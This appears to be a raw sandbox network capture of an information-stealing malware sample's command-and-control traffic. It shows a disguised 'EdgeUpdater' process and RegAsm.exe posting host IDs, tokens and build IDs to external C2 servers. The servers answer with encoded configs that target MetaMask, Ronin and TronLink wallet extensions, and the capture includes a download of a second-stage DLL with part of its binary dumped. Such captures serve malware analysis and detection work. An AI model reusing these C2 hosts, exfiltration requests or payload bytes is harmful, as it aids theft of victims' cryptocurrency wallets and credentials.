                                                                                                                                                                                                                                          2024-10-02 12:44:49 UTC5685INData Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                          Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          97192.168.2.658631172.67.140.924434340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:49 UTC144OUTPOST /get_file.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:44:49 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:44:49 UTC84OUTData Raw: 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc&ip=8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          98192.168.2.65863349.12.197.9443340C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:50 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----ECBGCBGCAFIIECBFIDHI
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Content-Length: 332
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:44:50 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 45 43 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 37 31 30 61 61 65 39 36 37 33 32 61 38 66 30 34 32 30 30 66 39 65 31 36 63 66 33 34 64 38 65 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                          Data Ascii: ------ECBGCBGCAFIIECBFIDHIContent-Disposition: form-data; name="token"5710aae96732a8f04200f9e16cf34d8e------ECBGCBGCAFIIECBFIDHIContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------ECBGCBGCAFIIECBFIDHICont
                                                                                                                                                                                                                                          2024-10-02 12:44:50 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:50 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          2024-10-02 12:44:50 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                          99192.168.2.65863249.12.197.9443
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:50 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----AFHDAEGHDGDBGDGDAAFI
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Content-Length: 332
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:44:50 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 65 34 36 33 62 63 63 64 39 63 35 36 65 38 38 66 63 61 66 37 63 61 36 63 39 30 65 35 38 38 34 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                          Data Ascii: ------AFHDAEGHDGDBGDGDAAFIContent-Disposition: form-data; name="token"3e463bccd9c56e88fcaf7ca6c90e5884------AFHDAEGHDGDBGDGDAAFIContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------AFHDAEGHDGDBGDGDAAFICont
                                                                                                                                                                                                                                          2024-10-02 12:44:50 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:50 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          2024-10-02 12:44:50 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                          100192.168.2.65863549.12.197.9443
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:51 UTC277OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----HIDAAKEGDBFIJJKFHCFB
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Content-Length: 7157
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:44:51 UTC7157OUTData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 41 41 4b 45 47 44 42 46 49 4a 4a 4b 46 48 43 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 65 34 36 33 62 63 63 64 39 63 35 36 65 38 38 66 63 61 66 37 63 61 36 63 39 30 65 35 38 38 34 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 41 4b 45 47 44 42 46 49 4a 4a 4b 46 48 43 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 41 4b 45 47 44 42 46 49 4a 4a 4b 46 48 43 46 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                          Data Ascii: ------HIDAAKEGDBFIJJKFHCFBContent-Disposition: form-data; name="token"3e463bccd9c56e88fcaf7ca6c90e5884------HIDAAKEGDBFIJJKFHCFBContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------HIDAAKEGDBFIJJKFHCFBCont
                                                                                                                                                                                                                                          2024-10-02 12:44:52 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:52 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          2024-10-02 12:44:52 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          101192.168.2.65863649.12.197.9443340C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:51 UTC277OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----HIDAAKEGDBFIJJKFHCFB
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Content-Length: 7157
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:44:51 UTC7157OUTData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 41 41 4b 45 47 44 42 46 49 4a 4a 4b 46 48 43 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 37 31 30 61 61 65 39 36 37 33 32 61 38 66 30 34 32 30 30 66 39 65 31 36 63 66 33 34 64 38 65 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 41 4b 45 47 44 42 46 49 4a 4a 4b 46 48 43 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 41 4b 45 47 44 42 46 49 4a 4a 4b 46 48 43 46 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                          Data Ascii: ------HIDAAKEGDBFIJJKFHCFBContent-Disposition: form-data; name="token"5710aae96732a8f04200f9e16cf34d8e------HIDAAKEGDBFIJJKFHCFBContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------HIDAAKEGDBFIJJKFHCFBCont
                                                                                                                                                                                                                                          2024-10-02 12:44:52 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:52 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          2024-10-02 12:44:52 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                          102192.168.2.65863849.12.197.9443
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:44:52 UTC192OUTGET /sqlp.dll HTTP/1.1
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:44:52 UTC264INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:52 GMT
                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                          Content-Length: 2459136
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Last-Modified: Wednesday, 02-Oct-2024 12:44:52 GMT
                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                          2024-10-02 12:44:52 UTC16120INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                                                                                                                                                                                                          2024-10-02 12:44:52 UTC16384INData Raw: d3 b2 1e 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                          Data Ascii: %:X~e!*FW|>|L1146
                                                                                                                                                                                                                                          2024-10-02 12:44:52 UTC16384INData Raw: 24 10 8b c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53
                                                                                                                                                                                                                                          Data Ascii: $@:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhS
                                                                                                                                                                                                                                          2024-10-02 12:44:53 UTC16384INData Raw: 83 f9 39 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35
                                                                                                                                                                                                                                          Data Ascii: 9wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5
                                                                                                                                                                                                                                          2024-10-02 12:44:53 UTC16384INData Raw: 89 4c 24 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e
                                                                                                                                                                                                                                          Data Ascii: L$ D$$;|D$;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|
                                                                                                                                                                                                                                          2024-10-02 12:44:53 UTC16384INData Raw: 8b 7c 24 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                          Data Ascii: |$2@3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                                                                                                                                                                                          2024-10-02 12:44:53 UTC16384INData Raw: 24 10 83 c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                          Data Ascii: $td|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                                                                                                                                                                                          2024-10-02 12:44:53 UTC16384INData Raw: fe ff 83 c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14
                                                                                                                                                                                                                                          Data Ascii: _^][YVt$W|$FVBhtw7t7Vg_^jjjh,g!t$
